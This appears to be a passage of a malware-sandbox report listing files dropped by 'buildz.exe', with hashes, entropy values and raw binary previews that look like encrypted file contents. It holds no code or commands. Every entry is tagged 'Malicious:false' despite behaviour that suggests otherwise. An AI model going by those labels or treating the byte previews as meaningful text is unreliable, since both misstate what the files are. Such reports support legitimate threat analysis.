                        SHA-512:05DE0AB22510FB1275D8A83E4047F65EA9AF9FDFEF8B8A70C1D2043289D9143961C28E270C76F897FD3B1086DDC773D51E46DE4F58ABC4C7DB4AAF3641C61371
                        Malicious:false
                        Preview:1,"fujN9.r..G........7......a.8.....g.C....s;.B$..q..f..pxR;..L....R...z...f.X.....b.gB.I7h..S....>*N.5..3..W-..:......l...x..Y.h..A...+..AL*.As...c...e0../}.o....Q`..8...m...QN......\.S0..a......X..EFJ........r.#.M+.....m...`...t+..~........#......M.K..7..A..6..X.;..CL. 7.h.8..."..kx.v..u^x(xJm.O.. .h...@..d)b..M..P.9dg..g......m..*..Mvc.....FHx..wW.......(.."....Q.<.!....h.....F@Y.b.!..!..jH...M.o..K;..U&..R..'VH.......TE ..E...........~C#.tO|}...m...<n......L..R.K......p."...q-....\UJ...j$....:.......o.++y3N9...Ux.7(.v..7:....w..q0.4..7.k.B.C\B.].=..)1.....%.0...>.B.:...X.F..q.)...4.^.}.'..YR^`....u..0....t....'.......d8.*w.!Q}TG.M..~>..r..Iqz...ZJ,}.|..*GQXJD{m..o.9o..7...`.q.....3.j..*6.w..k:.O.b.|.f...9.nW....'.....P.g%v.+.`.]........'......=z....a.G.>.........P.r;cS:.L.f...~U..I..N.Q}...o.F.u.V.k.+.C;.N..<.jE..LjD....S...[(..U*].....UU..P.f1..}%(.F"N...<..@.E*^.?.....f..if..<.o(.f.CF.;...1..7M...&.D%X.=.Y63~.S>?.L....7.14.C..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):976
                        Entropy (8bit):7.799391554948212
                        Encrypted:false
                        SSDEEP:24:UTV4+ZFrPngMN/n+3YLFD7LdyGT3nWu7GbD:UugTdPF753T3nl7UD
                        MD5:C07D9227071BE7186A4266C67E1D1049
                        SHA1:115B1F7DE22EB730949A2849274F9467AF837067
                        SHA-256:8E880800AB1D2F3E1B8AB1C8E0650E15B8BE0800DC3DF3AF33F02712E76356F4
                        SHA-512:12ECF8F68CD44E4EECAD94BD5DE3AAD624C852624500A1D50DBEA666E2A9A152121BFEF74FE11678B6A94514367777C663A1A590DC29B425C87D41684F530AF3
                        Malicious:false
                        Preview:1,"fu.(`.l...}oFxqWK.._0.....7.d.....1...EE..oJ2GO,.>m...U...y!W;3....LAn.e..|:...(YF/...9..j<..8#....WN.5.!\...$kn.@./!K...../....c.I.r..v...B. ....<..H..(.._.........Z....Ccv.ed......mW7.)^a~.R.ab..<.........*.K....2.g..0.....N.Aen...9S.i..SE...4Q..|#.z.u..'.~TKQCZ..&|;1.U$...<.^..y.M..n;.]1wi.....M8.s.su.(1(..<.i.5...e.>..Z.k..r.oU..W..(....^1...M....s"&..',?<}[...]~.WLVTX.m-B.}..,[...Y[ .a.F.0'8..g............Y4.'..Q.p.Y.7..r...hm..\..NV...=v.@SP......>.7...;..,.....dB. ..j.k6....u.Kt..%..k.. ...l.&,.S.x\).^.S.F......v~Z.Kx.......ntKL.3.[......2.1.Gz..6.NR.f.e;..x.;..S. ..X.BZ}.r....}.}...3$........`u.8...Dx4.|.3.jX....y...>N@=..9...{..R..dz.j...v..... ...Uz`...F.B@.... 9.M.i.`....B...C.Mtp.1.....Hg..-M.%....8...<+R.k.X..<.'K..Y...... l...d..>,Y....[.7NH.P..i.|.^>...}.pe&D.......Wx...O..=..u.J....hF..M...C&[l..+.kz..n{.)._%rJ...H.1..O...G&...Mp.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):976
                        Entropy (8bit):7.795595834591662
                        Encrypted:false
                        SSDEEP:24:CW2acwjM7WbYLaT3f/icJ4D2vcrqyc2nPQ2v7kBxtPHGbD:k1wUHLkXicJgqy7PbzOxtPHUD
                        MD5:A7A18B646CE52ED67BA3368A043FC39C
                        SHA1:3CF816C21869065C6B4D9F1F9585D4129D3154EE
                        SHA-256:7667E5A040A4375C797E531DB2EE0CBA29021C0D3C58FFFAE0914A9C8FC8CECB
                        SHA-512:561751790FA15D5CB3423B6D5D8531640134720B2F9B393D987B172AD468ABAA5CBBAB29B87B45699B577E75F3862BD94E685D166E7C4F66481241ADC5DA9944
                        Malicious:false
                        Preview:1,"fu...eIB........F...d.A...Y.?.............1tgM.(.#...B3..j.l^;.......s%.....&{J..x.K2....L=.[...3.nS_..r.c..h.88ZbBeT6.A./..Be..!.}k?{.d....o<S.a.'.|.L.a..dL.@B.(.\.u.j.w.i4..'.2........_....j.........l77+F.\b.!.V.........&.....|.d...5N.\..o...]3>.tdZ..\q.\.wr1.Xt.6.a.o.............u..C.K.|s..#].%...z.^.N....`./GrL......Z..9.ub.Vb.K.(.3Qs.c]]S.m.:|..J-...\c..r....I.c.:...|P6e........eVs..nw...R..Q.S...........,.H.7..0.^O.=`0\....3P.YU.....^..R..bd..[j.X..R..H+...k......n{..R.P<..|.....=h.{.c.L..&hcJ.NuOj[*.F.^...........!cx..<9...}.2...)....B.Z5.X.._.1....B....r3.Z......y....v..q.W.x...v....}ps..1.... /.Lz6..M.[...z]nH$...l.-{IR......S..T..k...nS..2.8.uj...m.....y".;..W_.h......y7.|.f.u...."..._....[....v...*On......t..\.Q)Mv.+.Q..B(u..jn..2.u..Y[T..>.w.d...Kf.\.....%W;../+....&)T........y.W.F!...pu...-.o.Sc%..#..D......../....."...;...f..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4194638
                        Entropy (8bit):0.5184856873195793
                        Encrypted:false
                        SSDEEP:3072:u227z1T0VD5q0MxOeACQ9z0dhrWqmn+LLYcLi97RrVNwaP5A:Z2lw56xOeAC2Mhr6ko7RrVNS
                        MD5:771F4E568C11D616B5B5077971219602
                        SHA1:1233F54713ABC45A53812C3090C19EF1442D4DB8
                        SHA-256:3146988ED79CBE246A30FB5458F46B80369443E2F86DC3CB6112B1CAAB25D086
                        SHA-512:D88B6F06A0B7F9C2FBB95E86506E0B1C094642F6E35A1DCF4A9ABB1DDFAAC03833A76D2888AEFDD0A1B0F5724819BD145D4A3FD6A73B73A9A6D23B323706A3D3
                        Malicious:false
                        Preview:.....V.M47^UC.s.o... ..?L..?........\....!+....(.......Xm.5....$..0. ,..B;y..{.]fG....0.......8v..*oE<`.S]i.X...]......!..[..H..Hl......4..\.@ENSw.rXU.....v^.i.X.........pwR..;.N..1t..6.......*...>q.2Q.....m'.L......Ca/8Rc{N.9...".i.z}......s.>}....B..y.z...U......k.0...n.&;.....fK.Z.c..L.=.j.W4...B ,..CM.N.RY..>o..'..*u..P@..H.Q..L....5.V..?.....(...9.[.6.Bk.W.).&l8."\.F..Iq.b.H.......1z.'.4.Y....T.;c1...pQ.$...I....7k..\j....M.....1......6;....$k[j..H......Z@~....hM..nt.(.....0.....B*...&..B.H>[.2....N.Z...]....w..)e... ....KB.R_B.pr..@.../."jm.....E...xW...x,+.oWb.G.3.qFq.....4.d".....*...`..$.W.z.`o.-8.....>.a.]tpJPo....#"...!w....Z0.At.0..A.i.|.".......(...G..~.YN=F.N.r.y..\.4 ....h#...a...Q.p...=...P.Ae......e.8}.8b.R@.:.o@......D..-.F..zw2..S..w...-..Es.ct.Qw9.JM ....Z.H~.<..=..G.Gm.....J.E. ...<,.h.@X@..Y.1.yo.B..KFhU...ak'|......Z....pUX(..Q....Y.[....H...q..............W.J.0......-.}...\............|.e.W..7.8.TD.L.HB..'M)..)..^....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2203
                        Entropy (8bit):7.905399869826783
                        Encrypted:false
                        SSDEEP:48:0vbzriGVIkN5lnytgcLZoYX+ySrNOdLZ4ZUD:SbzVIk/lnytjLdONEBZ4ZA
                        MD5:8B48BABE3920FCAC9A5603EFD98EF315
                        SHA1:58D177C9E59FF6EC2A5E453D17439FEE75892946
                        SHA-256:954CEA7F029F103AE5D1B1B1B5BDFC367CDBF3AE26D1AC12137D45919BE1E2BF
                        SHA-512:8EE7D27259827D678F10F1C20983EC3550DF2BCA85C53138EA1B5D9DC34B1F52214608C9A9B5FE97E7C25958DC0F18467EE8547346612B6622388D86859EF9EB
                        Malicious:false
                        Preview:<?xml...x8.....=%t.%.d!}....c...-..Tw>8..m...H...r.|..7%.k....Y..w..h.r.,.G...Ae........+.....'......*.\/.e9..h.u.l6......T....l.o..5. ..N6IIA.F1..8.$....Q.../E...fta4]..H.).w.OY..z...."..2N...f.i...%...W9..c..9c..,$..|.....j................G.~.kj....u ..&{..6...P..5......a.[...;J...w.-.Iw....QTxL..3..3Xk..5./7...B$'.-W.{[E.9.K9I......%7w.A..A.r.G.4...m.U..e<BtZ..@..a......a{..^.{IV.W..|.......:m.i.)0../J......L....AM .A.|.......n..O....\....H...2t...._O....i...F.h....G...`P.+3....C.\l.+0.{....1.J:.8iP\..........x.,+,..|.K.Q.&.3..I...>.O...h.T....|..........o.n........C..A..b.\... .T.h....F.^.:P[0B."N...L.?..D.r....{.q..'..l.I.....F.a.2.s.WO....V../[).S..k.=.......l...}.On..C.....[{...t..o....rx.p.7O..S.0.....F...I......-........^/.l..)s.Km.....M....6.........{.q..N.....Y......2<.].`.-.nrYS.}BM]...b]1J....~a..4}.|....#...y......K.|.....X~..e4=.'+.>.....-t(Y....{2.....D.?.H...X.s.. .:!.j... .P....J....l....S(,.(.r7.%..{.n..&....5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.981681632097774
                        Encrypted:false
                        SSDEEP:192:K1pGUHghPSBFT0FLoHSH0goyKdbM4WdYLqDvPxpFi4FA8A:KWRPS7YBoHSH0kcbMJYuTxpxA
                        MD5:B8B3AAC1A89D8C7FEC5EC065947C4729
                        SHA1:48B19C49A7F7F99C3749141DDB438C076642473E
                        SHA-256:05CD341B6DAD61165ED1171867E8B2549AADA53A52E1C9ECB355EA4E459991CE
                        SHA-512:EF97278C982A09E3B50CC62B13A6EA1895E22160BE2771649325A97D5532C85EAF90EB2F748B7DC16DE0E85D141D8415A28D49FAF4179BCBA592559A9616CD71
                        Malicious:false
                        Preview:..E..A....xE.=Y....^.Il....2...A.......%W...M+.5.m.r..o.|...Z.KJ>I.....-K. tb..X.n..9.iz..3..5....`...(...\ee}.....pf.....D..>.._+t.....'t..iQ.I1.......T..b.).@!..........)...._O.'....v7o?L.B.....y..c.*..&..#...._...8.......g.lk(.).MW7t7&..k.].....Z}.{..!.(#J..J[.k...f.i.&.9X.7.?...EA.e_G...r.$..,=...4.......H?.s...........J_.*.3....M..9.fD(..6#.G.|K.0T.o..8%...!bb4..I........g.-..PXtw.l...T.~'....$.5.W.KYr..5W..u.qC1..b... ...2..3S.e.H...@...Y..2v..A..-*W...sk....9f...Z......K.2.`.I8.:.u...Jy\.V..n4..{.....^.sLW(...K. ^.....K.....V'$...9@.:.+...~.k8qh.|......R\.T.....fx.M..*_.*..\@.=}.?..~s5xO....2..p..:..]..x.v..............o.x.D-g..H-X...G..Q$F.h.M#t3..."...]..de...........c.l..Hl.;...l.....`.u.y.d.<=?D.4.0"}.R.)..~...wK0.sA.wW..S_..X^C2U. ....T.u.c.0....y..-*..`.......C........!..8..Z.......R>1......g.k........R*6....6...U.n=[[....H....T..wn...C..2..... ..r..[..?..:.>.4."-.......".1...[.6q4.q.`......=W..Z..,.._.>:.k.7....~0.Dgq.|.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.960202182067216
                        Encrypted:false
                        SSDEEP:6144:AqTXI7bzXVxVH8/JGbyXH485w9uJydeVixDeBfh5:vXI7bzXVE/JMyXH07de0xDel
                        MD5:FB745C26AFD93E18350C1CE3693D94AB
                        SHA1:9F33467C263B0175CC29BE76458A306C2CCA468D
                        SHA-256:4596B04DDBC63ED5468CDC85C0F9D24AF4F523973B14E30E09BC0F7EEF652154
                        SHA-512:7F2B293DA8407144BF874DD7E05DC031140568BF5474B96BE0BB31B59E3FD3DEC17A429AC821613B7C37D7D76F878D0CA4ADBE4F343D7CBAA03CD1EFD83E291F
                        Malicious:false
                        Preview:?.8T.V.CSr..L...8J"A...;...}Vn!u.z:...'D..v.......x......"/;.U`..6."vN%{..c...7|+b...Q.._.$0..S.....9...C.@.......E................1X_8..f..p..Lv..b.Nw.J. .......;..$..{....a .......V..{4.k.....M.q....k3.U.`|.Yad.O`...r.X.$Zs..F. .q.=....X...YRA.m.-....O..S..t[.....X.M......[..w..aw.+.V..{EF$%].SN."KQ$..7P..H.9........1Y..Q.."p.R...(.j.e.K?....@.l.W{^...:..Vk.CC.....,Z.$.....;{.....T!...lN..Z.X..b.R......b.4.6..c.Y..m).G?.tz...?+..~N0+C...L..x.Y..z`a.,^...}..oR.3yQ..D....8F...;...&.~%4)}...X..BN.c.....@...S...V;.p..KB..k...d....Ls....1.....C.j]....i.....]0.0.~XS:....q.m.8....p0R-...[..o.../B..0@2F.....%1'..<.#..p.Y~..`./P#t.5..{....,B...=...p.n.@..a%.>r..~.....ir...<:..F....>..C..N7.q..[.?......hz...!..n..G..).\:f.E....k]...D.C..~.......c.*..A..ruL?+.E.U....=;...iO.....wX _.M.....3KL..A..y....A.f..a.G.m...A...E].XW..w..+DO.....ew.l..Z..:I....pm._Y......r.5C...d.J.3.0............J.'.#U-.O......."+BXs..m.d...*0..x..0..`..{.B.Chg^..S....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.207588361520377
                        Encrypted:false
                        SSDEEP:3072:1VxJYFtE/I0Jxda5NeXomhQkO40ylY2AYL5umEv2NpWzFevwDfA:1rcC5/aFymX7YNuj2NUFewM
                        MD5:F91766C5DE8621E6C511FBE3C02444B3
                        SHA1:9070C7AC941BC5CA6293A1520F3034FA682362DD
                        SHA-256:135BFF5DB162CF6F2896CA36E878E13BD2A45ACDA373BCF28763F3FC29BF18BE
                        SHA-512:0B60B93FD21005182BB93A9B9F658A4C266EABBA2D63D7ABE7690E2B0EA100DDCE00D04C633BAAAD2588BB82B29A95C74AF6E121115DC6EB72F77D92A9FE979D
                        Malicious:false
                        Preview:.....T..my....z.,....xrwr.-o{...4..-]j...@..z7..S<.y.X.l..b.y..Z..*..V{[l..s...3.19.c.+.B..<B."..-(.k<A.D.>_....f...}......=.y.'.Co.....K.....?. ..'. p...;.{..5XVI.^H.....)Ds..M.\.5...0......i:n9+2.9]..y!Y..d.B.........a.TD...|....b.".S..U{,#.?.W.ds.e..e.)...&....9...D.a.?#.... N.K...........G[8j....T>]93..7e..H..v_.r.G:.|1..-...QW.s.........|...B..c.$_.....K8F.S....d8.+..[....%.G....D.We.S........?....B.m.g..Xy.!..U.bkE..}..r..........|.....)?K.....L .F....|C.l..E....2tmT....,.#6UnsW.).r.ZLt. e.1.s>... j2.]......|....O....3..hz.....O..z4..Z...x.u...U......+...(.3{..7j.)....}.......[<..Ufe&#{..R..2i...%8..C.Z...6x-/.*..{...j.'...[OW..6]x=..ex...:.m.^..$....1.+.....$.?Rq..R{..DP.....:...0yc.`.......+..T..1`.....V.L.c.Fn-..&.9.?.<...Z....p:.*........I./..M.l..........J3R.....".j...R.x..BE~1...Yn............%"F...4.qlE../U.l1...}.6M.V..V..c....P.^......(.87..k.X...[.......C..!.h...3@..yA....&..L.\.5(.......{..:>..\xP.&.......|.b.*.B...@Pv.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.2080983432969656
                        Encrypted:false
                        SSDEEP:3072:c9oQXE7gO2a/Wnus70nduLDpZ9dtdYWUMRqv/zqgZ2JGA:c9rUkO2ZnJHpZ9dtdYY+7qgZ4P
                        MD5:8E549DC98D2AEFEAC5E0063FC0FDAC10
                        SHA1:62FE0D25AF8979A4B3C559AD8AF461950F86159B
                        SHA-256:0C74BD34D8542633A98AD56B6E7D2BD1201934D12FB013168F6120EADBF6D45C
                        SHA-512:1595BFD15655728B132846B55420D52124E8A35E12848869C2C56257A121EBB6DC37C0FA68E4837EEF6CC6CE3034E03F61459BABD493FE46171691C0DC817BDB
                        Malicious:false
                        Preview:......>.x.]...WT.E..4..5.?.?.:a}.......(..@.d.6}.==|.{..........Pr.xB[...eZU.=$...T.............2j.S!.....wrK...2.....K..H..[.dX....U.v...8;.@.R....+e.?../.ze.Qm...L.70Q.g.....d..S.....c.2.. gI..r...q..(....Kf.q=....5.}vu{Xr..%wR.V..G..7|..Y..s.j)3........_..|.E'.b.c...S...i...o...`.Hi..........X)=....J.e......I..O.\.K..(%.`.P<...1..9.....!...nFaF$........e.X.n,kl......6.,.G..JI.o.<<..`..AB.#).....O.V9.......hu .4.f..?.6..o...I.s>6J.....2..K..J.0.TR.D......`La....$Ht.<Lp.)).<....f+X....lq.&%.?Z...X..|C*.i.G...6.y....p..D.c...6.j.H.....hN.L.U...e2..a.^.&,...G..r...\...+.Wt8.0A.%b..}. _..5+.j..T.IW...i).l>#..U........@.>[!../!da.'m.j.g......O..p..{.;..%/.h...'......*....wR..U..@...o.'`...S..yl.J......p..]+a.Y.\..E?V= ....n^..@.$)bT}'...s...o..I..T..rcj..Eg...........R.o....+#..P..........Q..K.c.p7..!...K.l@X;..Vl.y...e..-R.... R...foVJ.c.N).zW....f.v.Y{..V.BR.4]...'...J.=...m..~..d[.f....`..M......._...366_...._.#.Q:....O..h.".........r
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.2077684122043957
                        Encrypted:false
                        SSDEEP:3072:r+iZdygzWxvckGATPsKmQZOxI5gwGas72ZIo1zjdOHCAIw6N56A:rdYIKckGAJ/R5HGasShda4b
                        MD5:F8152AEDEF153CD7705D186F7C702EC2
                        SHA1:76C4646E75331D9CB3FCAA8A15D575CBA72F1C97
                        SHA-256:11C5DD8BE94B2507100DFFAFE2D56E96A3B6E91FF660523EB0A79B653F44B04F
                        SHA-512:F0123C3A75A641AB204DC30A4D3E61711ED111FBD1755D5A49DCC91BB8BCAE7546225C3B58DE76D33D7941C4BD57D0F778361A0C8ECD3E20CE7285DD42DECD1F
                        Malicious:false
                        Preview:......l..`.K9..J...B.P.`.../..;.+....C@....xu........X..N...U.&...o....Y....6Ez`!.QO N..ib.[V........U.&4Ai.C......^6R.^ra:d.Is._Y6*.b......}-Z....h.h...6..WG....,.$o.2i...#..q.C4........dv".-.S.#)..{....zw.^......T.S..*.UVe.P....9.......4^.K%..".j.$?....$..zI....n.WNw..|..k)91...j.H..m.tv6....M.c...yN)r.Z..1.<.:S..d.X7.".;......l.F.+....L...Q...w..T...:.=....C.N.o4....d.%.....r.?.Fw.<.W(...%..r..RVs..V.eH....\..t).i0../......a..yw...I.......B.."..N<....4.[.w.A...r.n...%4x_..b.%...:...5...i..,.Xd.Q.{Y..A.G.e&z.U...hOY37e..#o.P.>s.......A..]S.....W)J9[x.hI.=xsai.4.Q2.....E<....5E.....?.]Rz..`Z..$..i7.;......%vX7W..E..1.)2.A(B...4f.....)fK.Q...\...O.2.9<..s..v..m.I......b'..J!S.t`....!......j.......]./E.,p..C..Y..|.+...x.....k.. Q.............on.'8.~...~...6~....H......Xp.Q.W.]asN.Kp(..V8.B..n.../..I..W.u...q*.B......_.~.`....=&....;....2.<%..dA3.l.M...M.y\`.[...B.y.'.......hff.i..).k.8.k.D..P.%..l.h....D|...<N.k..R.....x.%K.D.iBn@.|
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3384
                        Entropy (8bit):7.938836981471465
                        Encrypted:false
                        SSDEEP:48:r2K15qJUE1Od+DXWUYwSbQDYCxG9V7h7vzF+UOdkH+BBg5aFgJEZ/I3av6RmsCpG:wo+bR6cEt7vzFYFqsAEZ/466RmTpRA
                        MD5:A51393D4F54F50C1CC2DF4585BD79FED
                        SHA1:687A1FE62B47863F194C14EB97B84B9DD331D895
                        SHA-256:122727AA4B6768B8B6B20037D79852360B91726021EA0F3D668E9E2D927D28FB
                        SHA-512:A4DE07442C4095FF49F4ED3F0D2C249EA83B9FB74CA6A89FD0D6D8D72649CF6DA453C34A4F2C64AD6DE7F7281A97AACB2C18DF7A3C45C31B52B16B7B2EFA23DE
                        Malicious:false
                        Preview:<?xmlPX.\.i....>x*=.X..n.!.q.q..f..NN2_.....my..%.2...8.C.....a6o..1..1B9...+..c.Y....t/.w{..;....M.&......~...|........w.0...l......8......\..p5..Z`.~.`....:n.7^.05..9.t..T4..-.,..........l.B%....j.[...,..S}.F.K........T.L0.oqz..........0........7...@{?.._......:.Ks...4. .....:.P...r.M..J..]......4w.s.o..PG..%]{....=....I..u!...W.L...8..x....E.2...)....X..Pa..3.F...4...Q.......Wd1U....?.....B...TcD=...:."..$.&..o.i..1.u...........z.f:.....S.....\{6..Q. r..ui..p..wH..^..*....[x..n!.@.=.......^..YM^+=Z(.0......pm..w.x..1.;.~o89".>\./....?OfB....x..w6_....".......'.e/.q.......w;J...Y..P..x..n.e.H..b.. ...c.U......./bD.n..v .Q...tn.....^....r.6....qRy... ..WnK...g...u..X8}.l)&<...hI.E.[.K@...6f.|...+..^..h.......R.Y...... ...P2g...}.L;PJ....>..p..Q.^.6.HY.K.fm.Vh....h...[SJd...4.)...wj[.......z4.X.Z..B..^uca...".O..ms...l....{.;.....:N..-.'.{H.@S.9..}...9...as.....,......h.f.......SS...j*..P6j.A.&...i.qd....J....f..$..~&7W.sS
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1062891
                        Entropy (8bit):5.530132663642558
                        Encrypted:false
                        SSDEEP:12288:v57Yv66SiaXSZlV0N8x5thr291gess3TylunXc:v5Uv66F
                        MD5:9637D234A77E0C2977A72DAEDB4AF103
                        SHA1:3917E62423A97416E7CBBB60DBDE6ECC0DB19FB1
                        SHA-256:1935E989D41BF990912902B60D09D67B35A743EECD5258CAE83054053A94EF62
                        SHA-512:211BAC77BB0676237DFD37B4404367BB563CC30231B2FE4FCC0BD30862F31149F43E3C62E081B16F9517055A5D18ACB2F141A7D250CCBDEDECFE2C48B878A483
                        Malicious:false
                        Preview:<Rule.e.6k.!..h....I..|g7.......................*%...^...6....L..8(..o.....w.1....'4..-......U...n........; .8H..#.5.<.c.,>.~.`6.?.Ir.w.J..d.$.-Z.....t.q.......&.....!..O.Pf . .~..xE....7......^...`.#....F......y...uc.OJ...B..|....z5\Y2..|O...{Z..R.Y..7A.DfW..Z.dr.kT#?..vr..dy7.G`.<n.OB.;..H..b..Q2...8.P....Za#~.=F.u....|qN.A.._.....M2v[........V$G...;;g2W.Q.<X.|7...c]..P..A.`H6...T..k.....c.D.......D.G8..3....`......v....Iy..$..7$...l-5...4...m|aj$....~.....[.i.*...."..'........SvP...<'.....v..;.!.=...Y..#.j.*..l?...W.g.S.,}.YHVe...I.Y.L..Z.5..7?...6...........l.......*..!...%1cz.m2...q...LC|.g..U.-..6.'......2...Q_@...E..KQ..sQ.@.u}.Hi...2z`..n.5.$....bA......7.......y......E...~....|.l*.^..T..Qp....s.L..2._=1i.N.J.T....I<.}..+...L...g..;....L~m._.G...-..o..,......7}... v(Z..Nx..._...3.g8....s.....W#.......&!.....7}9.....a|..9f."..z.J.|.j.._...G.(....C....z......(.U......T.m.........k......^/b.....K..@O=....#..#_.D.../....:...a..*.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1716
                        Entropy (8bit):7.87387364090939
                        Encrypted:false
                        SSDEEP:48:VyrmO4rSIQzcrB3t12ZTZUwERvcAeOQUD:VyrmDrB32ZTVEGFOQA
                        MD5:981165104B3A48A67FC6C4F14DF292EA
                        SHA1:D61F12852D24E6217A7C61990E867935F3115193
                        SHA-256:C6379011EB4B18D8687FE89DED920B631D90A7BC5732B5A8F00E492CC063D493
                        SHA-512:5F0461F30B22820A0C25142BA1DE81C55B27D285D46D6DF5FD4797B2ECC9DF4AD0D0A2871B91D018470536766B84F705798DA4BA8D137D15147A9E27F5E602FE
                        Malicious:false
                        Preview:<?xml.Q...O7.U..G!q.?..ymNz....[B.....<}Z..g.....+L[..O..F..7p...9O.....D......#..U!o...%|...H7n8*O.?(\\.....nm..t....u...b._'..O`{V.`..O.;A.Q.i/...d.i.Lb.o."5....A..X.]a...._...74...C...%.+o.......i.Y..*.....#...c.B'.-.n..A%....6...y9..+..l...'..... ..~%(..=.x#.[..).n.s..f.UY/..*.\..;<...S..xP....4.9...Be0Q.;cm.V.n.k.N.B>.z..aEt..XZ.<...m..Z.p]D..m..P....\..y}...$.6Bv.....v4.j..c.44.;+.g.=.}......X.2.......B/......D.uM..@..v..Gp....{.f~L...iR.b.1......U..^M.$.F.IuT..8.>R32...Y..J{+B...}.p.7.E.:.g.O.[.k.......(p.L....SGq.V.j.|Xt.E)..(F.8Y.9...PhF...M.....$2..W.....<.\.&L....p.3.X..W;Q.....Z^x..R$E...*..1..|..6.8T...G.E....?.0...),v...../K.Z...G.,c...i.b.9........{7j..+.%.o..........z..G...Fx.J.D......CN<....Bh..fS.l.a7*I.........Sd......F+..'.Zm.a?.$.,.$.....O..M1.3..|..;.,..d...@....'! k9+_.Y....^\.I..."9.I.m..t........U..vN.k...o.r..M9.l.,+.*....=Z..1..O9$.#..J...d...,jI..g..N..w.B...w?........\0...7..S..~..%.d...w ...d.)1*e.6..,....H.9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1737
                        Entropy (8bit):7.874157059767498
                        Encrypted:false
                        SSDEEP:48:UJb1J/XCZwf59woet5WkBHf/xOK2uHnj7K8xUD:y1J/XCZwR9wDt9BHxjjH/K8xA
                        MD5:1E2324BF0195FF742BC0593CBE122416
                        SHA1:D70938B670FD7C105FBEB2E37BFBCF2ED70FD460
                        SHA-256:1D80310108D7766EF895B6191E21C4C7D777E5B4C18A3B3078C7F33CD9E500CA
                        SHA-512:B6BA59CCE98726B967DD01EC008F144339EEFA404F4B3F7F420A13B21EF933932072F4515C63A7119D8F43BC9A359644916634F38A0483D62EEB9D3D11634381
                        Malicious:false
                        Preview:<?xml....Z.ARR.@.F.m...qA....Iq..L.P....>..K.....@....|..R...z.C*....}]0.I..I....,..]k:.u..w....R].U..F..h...S.}..../..H....i....4....L.w.,.L'....d~/JkC..I].....ND;F..6."^..8p...ay8*.......d._.*.....6.5...9..+..^...}..Y7.!.YlQX`........1.-`...%....`.....W...4..D.....Y....o}.3_.......)....c..G..Q..q.mH.W.g.W..E.H..o..M:...&..h..8..0.P..N]...`s..(T.;..s....4E.]....%:p...}.G....).E.~"..3..V2..........p...e.O.mXp/3..U..K..l.M`...O.&..0Ic....JO3zJO./..4.z.C.....-..Z._....".[/...p:.G....E.+D.$.N..........{5l7...s..2./..E.s.<...2V..#..A..vx..W.~?;.. -..u..&..]........(..uABQ.f..L...]....^....ba.@.$.-._......p../.,..rT.B..?.Z. .gF...........|z..hp...~Ea.....dj1....:>..q..h.>..k...._`EaWf.0..^...F.H....}.\....}jb[.y._E..*0.Z0......(d.7a..s..4.S...-.p..hD..a.....<..W:`k....j(b...J....u....'..C.._..e.....4.KG........;.^..w.I.....e.<I.g|..0@...rh......H.J.......2}....R7...x..#N^...8..3.q..P.`....uK....S.Y.;y..E5)...92n.g..r.6.X!.Z......[\..O...?.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1448
                        Entropy (8bit):7.844913744079693
                        Encrypted:false
                        SSDEEP:24:/VeTxOmUgxOFfsEOAP6wxB8jUuIpfu87fDfjDCdGcS+NEqGbD:/VW/2fsq6wn8AbpfZDfjDC1FUD
                        MD5:0D216CE571F6E9D68078854054F4BFF6
                        SHA1:028BE9D059FE3DD442AD748CEBAF937E1A3D0AC4
                        SHA-256:CDA33ED0A5B1ABFC179320DC72AA6DDD86A490ADEE097103608318CE88E404FB
                        SHA-512:E67ACFB476D2554CF7770DA55006394BFAB54B2BA451F88B51EB43949C44F815DB2904D097594122B6D72F039D19D8CC921C5E7E8D5737DFB84D1171B2DB99B1
                        Malicious:false
                        Preview:<?xml.y;H.l.WC.(.F....+.f........p.....p...U.a.=EWLt.D..E.9....Xfe....+?z..M....+L.."'..U...Q.......Do....W.iT.0..t.i.g.....o..{...wh.9-.Z..u..2\......6..V....)....).=.<N.`..V....V.K......k..(.|2......+u7^.....=....5<..7.|..%*..)oc.[@l...T..u3.am#.8.q.,.....3...(.uN...q..Z..8...........8.K.g.w..,Pr!.....X.."^....|.........L..c.'C./s..2;T.Wp...4.....D$.qw..9.....s(nF..Bn..ReIN..G.......k.Q....e)..fKji.x&....u..D.M...&..g@`.....NxS.L..<.O.E....).....G...9O......'b....7..1....i,...w.E.a..(..*.g!H...O...}...Lf.dN:q./.t.O..s.-.....r.. 